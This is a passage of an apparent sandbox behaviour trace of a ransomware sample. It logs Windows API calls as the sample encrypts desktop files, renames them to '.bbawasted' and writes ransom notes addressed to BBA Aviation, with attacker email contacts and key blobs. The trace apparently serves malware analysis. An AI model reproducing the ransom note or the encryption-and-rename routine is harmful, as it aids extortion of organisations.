FOLLOWING KEY:\r\n[begin_key]PM6qMTSK+M0hi2Fzg0PWkSuDDrqZD04ykpg7c+Cr3r9qsdj4u8WihvKnf5pn6kpl\r\nKi6ssmLEnFz2jzjApWAMYPBP0kfJzUONdov3yxu8lEx6KzD8EfXNd0lQno9RMXp4\r\n1Qd/yyo5X1MAkKy4hYgfNEnW5bAGjXiHSseh4bTGXdbHp5MEc+S4znIIpR9IGd3z\r\nDxtB/aRaECyk2YjZgazxNmlAsgKEpgA/bowsoUBSH8BpV2HrtgT9QgLXfGbiKDvI\r\n46dcblvM+QDHmuZXlpQhbc8jkCE1WG7d/zuzAz5Ipe8GC2E1G1tNNrevTD9PGaxQ\r\n6aKjW58GwaSGQ936WLGucKQvMRg1nnKox0iMyTGB715KT+EVTk2ticbV4l9PDrvw\r\nIgO8/wj3CYjHogokN3PBJNZ9ZApYSdSyePh27DRLDAOtcuhBHHW1Tv76UTrH1tOO\r\nSRGiQitT8SFyAHNRByCiyc1PewYEG08kiWgzDsU6zPu6nJwemKS3BOKerqXQmoGb\r\n0V0ANZcTSeC5qddC1CQc2HjDh6E0ghkmsrG80kbgIBta0wQ/+sWgd46drLzNK/ia\r\nwAI2BZBdXQlNETY+yu4sRwuVTh+79C73vI+P23qsCEKuI0dtoN6m8qDhIazkH8T6\r\nMKoT07QiMNb+YZCZ29dX9IhQDuADoRtoumjB8GwzEAw=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.460] WriteFile (in: hFile=0x27c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0205.461] SetEndOfFile (hFile=0x27c) returned 1 [0205.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0205.714] CloseHandle (hObject=0x27c) returned 1 [0205.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0205.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af6a0 | out: hHeap=0x660000) returned 1 [0205.716] _aulldvrm () returned 0x0 [0205.716] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0205.716] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0205.716] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0205.716] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aYj6iZRBnapFPEU.bmp") returned 47 [0205.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6c4b88 [0205.717] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.717] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0205.717] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.717] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0205.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aYj6iZRBnapFPEU.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\ayj6izrbnapfpeu.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0205.718] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.719] SetEndOfFile (hFile=0x27c) returned 1 [0205.719] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.719] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.719] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aYj6iZRBnapFPEU.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ayj6izrbnapfpeu.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aYj6iZRBnapFPEU.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ayj6izrbnapfpeu.bmp.bbawasted")) returned 1 [0205.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aYj6iZRBnapFPEU.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ayj6izrbnapfpeu.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0205.720] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0205.721] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf391 [0205.721] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf391) returned 0x640000 [0205.721] CloseHandle (hObject=0x288) returned 1 [0205.726] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.726] CloseHandle (hObject=0x294) returned 1 [0205.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.727] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0205.727] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.727] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0205.727] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6a38) returned 1 [0205.728] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0205.728] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0205.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.737] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LYCj6T7ubcGmcs29NbbWlVlb9TtB508cQsNr3N/4YLBTwE32YWZxSnkTEqkZ2mVT\r\n8sPb6UsVk9fcARnSGpRVnbNGa32pVxuNA4R9qTh7C06lWsJ0KhV1yoK7nxnijaH/\r\nXadJEWUrdnz/RVLcvZ/c8cVp3s01rm60qjvJ15YsRCv+IYEtQ7hAIZ657bSrM7fk\r\n8+Wf2m3cnwcUp5yn2aXZupBPad3nKflZODvJe8ihdjL4pSS2/aKKGxhrD7e8KjXp\r\n89+s4rTV43B75Ib1Xc1pSI6ftChOXLKNhK6rPXU41UFgVR29IupmbwjoV8hLNKMh\r\nUErCyv2EiFNsHJf6cx2xLAGS3oOl3z7zTXDomDYKmvQqFBFXQ3HkNYDMjS7gKTTj\r\nQf4D52wum3WlLA7PIdGcQxYC1Y7YRj461NIc/ks6uyNcPA5LQAHvARciflouWyEc\r\nyHqElC16RBW7VYoPN/YFbmAYkJddKDv5qyTx2f3tFfeFzsNLY5QRiZ4ZwxgpQBxx\r\nyAhiAhiQlXdfw+8Kfn6WiK2KN78KgjEOlRAI/DJwrsh0PwnOoo1vER10yfpj8mE5\r\nUGsshk9Xfv0Y5hsv2jDZJ0W0LRZTRRZ9+U0Yc04qM5jPJAzxuOCmmzEinrcvrDuO\r\nJV4XgPsuiD1d67pFrpzwGyybl21Sii5ZwixwRvVSe69=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.738] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0205.738] SetEndOfFile (hFile=0x27c) returned 1 [0205.740] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.740] CloseHandle (hObject=0x27c) returned 1 [0206.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0206.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afa38 | out: hHeap=0x660000) returned 1 [0206.149] _aulldvrm () returned 0x0 [0206.149] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0206.150] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0206.150] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0206.150] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\dSLThpYxMe.jpg") returned 42 [0206.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25e) returned 0x6c4b88 [0206.150] lstrcpyW (in: lpString1=0x6c4bdc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0206.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.150] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0206.151] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0206.151] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0206.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\dSLThpYxMe.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\dslthpyxme.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0206.151] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0206.152] SetEndOfFile (hFile=0x294) returned 1 [0206.152] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.153] lstrcpyW (in: lpString1=0x6c4bdc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0206.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\dSLThpYxMe.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\dslthpyxme.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\dSLThpYxMe.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\dslthpyxme.jpg.bbawasted")) returned 1 [0206.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\dSLThpYxMe.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\dslthpyxme.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0206.154] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0206.154] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x50c3 [0206.154] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x50c3) returned 0x640000 [0206.154] CloseHandle (hObject=0x280) returned 1 [0206.157] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0206.157] CloseHandle (hObject=0x290) returned 1 [0206.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0206.157] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0206.158] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0206.158] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0206.158] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0206.158] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0206.158] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0206.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.167] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eA7cos1WcQC8hS8vp3r/pSgSSxiFM8Ng8+TgOyQhXdsiG2buYNLxXnk9vZPq5gUu\r\nRNUZkCMXIVgqxSynyO79L8KStq6rY8K+74ifTN1ar6CPBZ0hXW2i3LVsZzjffKhZ\r\n1XuEVFbPQxqlzs6dEXrjrf0Ze+YJ4mM+9eJM0DKvNSuv4LO8eu5CvdMt95c9GHPi\r\n/4oKFJzb4v/xBej9564mCe9VExLUIT1MkBaK76Gv+8GsbDzCHMutcP7F5onh8YT5\r\nngR4615FJ7KIPRIucgkoqTA52P4ZB1coQplc0CgU4Y6KldrcdlwJnr3IFYzDeuJm\r\nHr/so0cdqzGFGwNgRqj9WtVkdUzgKek7vegDQ0CpfBpQOAT6afGNYaQeB6JWPUKZ\r\nAnxLXmloy5i1xXiSqgxxJXKYqavfuCzKDQENJAF0TZkVXfm7/y8GZZBZB03D4HCm\r\n4u0XZChqabpgOSPwmlmEuV0MYc2/tXLuxL4YWD5bpdhuGyCWUzuEPABa6XGyhPhI\r\nz/BTk4x7MMP+b1Dzo3YONw62X6Vbv0KvjyRjDGqyHTT9dUsLIuxfJo1CylLIvCNB\r\nElsHTSw6lt106kglnnhVoHjDmlJtI3jOqoJFxkLPsjFkDAoeuwhXNXwqucfRRNO0\r\nqOtpstvMu/nxNRAnftosPU/wkdPOIozPQdQ30pSN8Oi=[end_key]\r\nKEEP IT\r\n") returned 984 [0206.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0206.167] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0206.167] SetEndOfFile (hFile=0x294) returned 1 [0206.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.169] CloseHandle (hObject=0x294) returned 1 [0206.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0206.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x660000) returned 1 [0206.171] _aulldvrm () returned 0x0 [0206.171] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0206.172] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0206.172] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0206.172] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ECbiQJNOAggGgRDXIWvg.avi") returned 52 [0206.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0206.172] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0206.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.172] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0206.173] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0206.173] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0206.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ECbiQJNOAggGgRDXIWvg.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\ecbiqjnoaggggrdxiwvg.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0206.173] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0206.175] SetEndOfFile (hFile=0x294) returned 1 [0206.175] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.175] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0206.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ECbiQJNOAggGgRDXIWvg.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ecbiqjnoaggggrdxiwvg.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ECbiQJNOAggGgRDXIWvg.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ecbiqjnoaggggrdxiwvg.avi.bbawasted")) returned 1 [0206.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ECbiQJNOAggGgRDXIWvg.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ecbiqjnoaggggrdxiwvg.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0206.177] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0206.177] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12a8e [0206.177] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a8e) returned 0x640000 [0206.177] CloseHandle (hObject=0x290) returned 1 [0206.186] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0206.187] CloseHandle (hObject=0x280) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0206.187] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0206.188] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0206.188] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0206.188] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0206.189] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0206.189] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0206.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0206.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0206.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0206.379] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HAHBbm0FzEfA1xK+yyUyPAWCUtuek2FIEaf98jNoqzmppUrHpTf+AI3xaQKbcw7H\r\nBX5Ou3e9gPXAvKd7idPa07aUgbW79vPtfdvhR+p9HfgZKSy96gLmYRTPlfcZwXM7\r\n7xRSMuv5K4iRR2RHjygn8+j/MgYqtG9YjA9RvW2R9xLIWv+Zt1vzPrhdQG1m7vo9\r\nPkqZ443mESr66r3L7MJ6CePI+nJD0zLkCiVYHNijmpjvf/NS7gpp0ylONoWdqoum\r\nGFI4ZuvwsDFgeioF8qdEH67Z5DPvsNAcduBMF8fEDqGQGjnSZQJBgRYb64cKiZ/l\r\nUUhxHE84G+pHsMie71QQXr8ntvizae4Zj+x+2y5X3z6G/OfqiAq4tKK/eTt0MMWb\r\nMCTHW5Hjye33Ndcje6irWoyOx/+I+cGh4nnZkeP7qb5aVgzPqUZH2X5TeyKFxofo\r\n7jrrzu9df0JWplcIzBYHFe7GIoK4QmXO6eV1m6TqqCF1DpKxB09erccmPAbkMK2f\r\nka6zDJIIJM3BSBr3/edAU2CSu9hIELQX9jgZKYoo5fAANInlXdNNppyax7tDmrJv\r\nhgw6OaMO0I/fiyiKA11MEzwhAxTJIUolo39lWb1VQt0jfN0nrP+qWltYLWJ2CksB\r\nQ3gJi3hXOveql+2LWGBmobRQNyqKSDE9qwjIEc8Fz8A=[end_key]\r\nKEEP IT\r\n") returned 984 [0206.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0206.379] WriteFile (in: hFile=0x294, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0206.380] SetEndOfFile (hFile=0x294) returned 1 [0207.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0207.242] CloseHandle (hObject=0x294) returned 1 [0207.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0207.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b03f8 | out: hHeap=0x660000) returned 1 [0207.264] _aulldvrm () returned 0x0 [0207.264] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0207.265] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0207.265] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0207.265] lstrlenW 